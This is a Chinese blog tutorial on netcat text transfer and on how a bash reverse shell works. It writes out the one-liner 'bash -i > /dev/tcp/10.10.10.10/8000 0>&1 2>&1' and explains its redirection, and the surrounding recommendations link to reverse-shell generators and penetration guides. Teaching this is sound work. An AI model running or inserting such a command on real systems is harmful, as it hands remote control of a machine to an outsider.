反向shell实操

最新推荐文章于 2024-06-15 11:43:50 发布
最新推荐文章于 2024-06-15 11:43:50 发布
阅读量4.7k 收藏 4
点赞数
文章标签: linux 运维 反向shell 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34250494/article/details/123135792
版权

实验一:
A机器传递信息到B机器:
测试环境macOS 10.15
1、A用nc命令 listen本机一个端口号

nc -l 8000

2、B 用telnet命令 去连接A机器的ip和端口号

telnet ipA 8000

3、显示连接成功后,B机器可以输入文本,文本会传输到A机器上。实现B-》A的信息传输

telnet的退出 ctrl+]

实验二:
反向shell,A机器控制B机器
一种方式是ssh 登录到B机器上,这种属于正向Shell,A主动连接B,然后控制B;
另一种方式:方向shell,B主动连接A,然后A控制B。
测试环境macOS 10.15
1、A用nc命令 listen本机一个端口号

nc -l 8000

2、B机器执行

bash -i > /dev/tcp/10.10.10.10/8000 0>&1 2>&1

bash -i 意思是打开一个交互式的shell
bash -i > 指的是交互shell的输出 输出到/dev/tcp/10.10.10.10/8000
linux中一切皆是文件,这里其实是一个设备文件,指向了另一台机器。
0>&1 2>&1 指的是标准输入 和标准输出一样的位置,错误输出到和标准输出一样的位置。0 指的是标准输入,2 指的是错误输出,1指的是标准输出。

我们知道LINUX下有三种文件描述符:

  • 标准输入:standard input 0 (默认设备键盘)
  • 标准输出:standard output 1(默认设备显示器)
  • 错误输出:error output 2(默认设备显示器)

这里相当于重定向位置了。相当于打开了一个shell,然后这个shell所有的输入、输出、错误输出都到那个文件。
这个原理就是反向shell。

3、A机器此时就获得了 B机器打开的shell的输入 输出和错误输出,并且拥有打开这个shell的B机器用户的所有权限。
可以测试pwd命令,vi命令,ls命令等等,都能在A机器获得反馈。
相当于A控制了B机器。
整个过程是:A机器listen一个端口号,B连接A机器的端口号,那么A就能控制B机器。很多漏洞都用了这种核心去控制机器,想办法让对方机器执行命令bash -i > /dev/tcp/10.10.10.10/8000 0>&1 2>&1,填写机器的ip和端口号。

参考:反向shell

星夜丶晚晚
关注
shp:Shell Please 1.0:反向shell代码生成器
03-03
Shell Please 1.0:反向Shell代码生成器 Shell Please是一种用于生成反向Shell代码的工具,它仅需几纳秒的时间。 每当执行渗透测试时,在使用RCE的情况下,我们始终需要反向Shell代码才能从目标系统获取反向Shell。...
黑客零基础第一章--反向shell
ShadowBlade
08-09 4977
一篇文章叫你完全掌握反向shell
内网渗透之Windows反弹shell(一)
不知名白帽的博客
07-08 2061
内网渗透之Windows反弹shell(一)(反向shell简介、Windows反弹shell
高级黑客技术-5. 反向ShellShell
最新发布
jennycisp的博客
06-15 930
❝本指南提供了多种方法来建立反向Shell,包括使用加密和明文方式,适用于不同的场景和需求。通过这些技术,安全专家和合法授权的渗透测试者可以有效地控制远程系统,进行安全测试和漏洞评估。gs-netcat 提供加密的反向Shell,支持文件传输和管理员登录警报。Bash 和 cURL 方法允许通过简单的命令行工具建立连接。OpenSSL 和 remote.moe 提供了加密通道,增强了数据传输的安全性。
反向shell
m0_52011198的博客
02-20 503
反向shell是从被感染机器上发起一个连接,它提供攻击者shell访问被感染机器的权限。反向shell或者作为一个单独的恶意代码存在,或者作为一个复杂后门程序中的组件而存在。反向shell的工作方式是远程计算机将自己的shell发送给特定的用户,而不是将shell绑定到一个端口上。后者在很多环境中是无法访问的。这样,你就可以对远程服务器执行root命令。
Windows 反弹shell方法
weixin_53747497的博客
07-12 2876
正向shell : 控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。反向shell(反弹shell):被控端主动发起连接请求去连接控制端,通常被控端 由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送 过来的数据包。
reverse-shell-generator:基于Web的反向shell生成器
02-05
这个工具,正如其名,是一个基于Web的反向shell生成器,它能够帮助用户创建各种不同语言的反向shell代码片段。反向shell是一种允许攻击者从目标系统控制台获取命令行访问的技术,这在进行远程操作和权限提升时非常...
shell配置nginx反向代理
08-23
shell配置nginx反向代理 作用:可以使用完全脚本配置,免去vi编辑nginx配置文件,可以集成到python或者java代码中,存命令行控制。 资源可运行,主要提供一个配置的思路。 此资源在一个api接口添加反向代理时使用到
hershell:多平台反向shell生成器
02-05
用编写的简单TCP反向shell。 它使用TLS来保护通信安全,并提供证书公钥指纹固定功能,以防止流量拦截。 支持的操作系统是: 视窗 Linux 苹果系统 FreeBSD及其衍生版本 为什么呢 尽管抄表器有效载荷很棒,但有时...
HTTP-Reverse-Shell:Python中的HTTP反向Shell
05-22
这是用Python编程的HTTP Reverse Shell。 它用于建立从客户端到服务器端的反向HTTP连接。 先决条件 Python 用法 在客户端上传输客户端程序 在服务器端传输服务器程序 运行服务器端程序以开始侦听 运行客户端程序 ...
shell的正向和反向
qq_46258964的博客
02-05 8743
正向shell反向shell 正向shell:控制端主动发起连接去连接被控制端 反向shell:被控制端主动连接控制端 在实战中,大多数采用反向shell,因为正向shell有很多因素导致连接失败, 比如说硬件设备有防火墙,入侵防御系统等,还有网站防火墙,端口占用,权限不足等场景,特别是硬件设备如果你正向连接被防火墙拦截导致打草惊蛇,后期攻击相当繁琐。 反向shell:而被控制端主动向外发送的数据包通常都不会被拦截。 反向shell如下 Linux常见反向shell bash反弹shell nc -lvp
内网渗透(二)——连接shell、NC网络数据传输
qq_61562251的博客
12-10 1594
一、连接shellwebshell的定义:web下的执行环境,shell是用于与操作系统进行交互的用户界面在实战中,大多数采用反向shell,因为正向shell有很多因素导致连接失败,比如:硬件设备有防火墙、入侵检测系统、网站防火墙、端口被占用、权限不足等,一旦被防火墙拦截导致打草惊蛇、后期攻击相当繁琐。而被控制端主动向外发送的数据包通常都不会被拦截。二、反向shell1、工具:nc(netcat)nc,也称为netcat,是一款功能强大的网络工具,可以在网络上进行数据传输。
WEB安全基础 - - -Linux反弹shell
weixin_67503304的博客
08-23 3167
详细讲解Linux反弹shell包含的NC正向shell,NC反向shell,bash反弹shell,无e参数反弹shell,Base64编码绕过,Telnet反弹shell,OpenSSL反弹443端口,流量加密传输
Reverse_SSH:一款基于SSH的反向Shell工具
顶峰
02-10 639
SSH
网络安全之反弹Shell
小飞的博客
04-12 1796
在网络安全和渗透测试领域,“正向Shell”(Forward Shell)和"反向Shell"(Reverse Shell)是两种常用的技术手段,用于建立远程访问目标计算机的会话。这两种技术都可以让攻击者在成功渗透目标系统后执行命令,但它们在建立连接的方式上有所不同。
反弹Shell的基本操作
weixin_46831054的博客
11-26 1026
反弹shell定义: 反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连
反弹shell bash -i命令
m0_37638874的博客
09-07 3959
这只是bash实现的用来实现网络请求的一个接口,其实就像我们自己编写的一个命令行程序,按照指定的格式输入host port参数,就能发起一个socket连接。复制格式有num1&num2,区别是,前者是以只读的形式打开,后者是以写的形式打开,这里两者均可。Linux系统中,把一切都看做是文件,当进程打开现有文件或创建新文件时,内核向进程返回一个文件描述符,,A先开启一个监听端口,让B去连接A的这个端口,连接成功后,A就能控制B了。是linux中的一个特殊设备,打开这个文件就相当于。
简单易懂!反弹shell使用流程
weixin_54475173的博客
01-02 690
反弹shell使用流程,简单易上手
反弹shell汇总(超详细)
qq_52173020的博客
05-27 9319
反弹shell姿势大全,看这一篇就够啦~
正向shell反向shell
08-19
正向shell反向shell是两种不同的网络连接方式。正向shell是控制端主动发起连接去连接被控制端,而反向shell是被控制端主动连接控制端。在实际应用中,大多数情况下采用反向shell,因为正向shell有很多因素导致连接...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值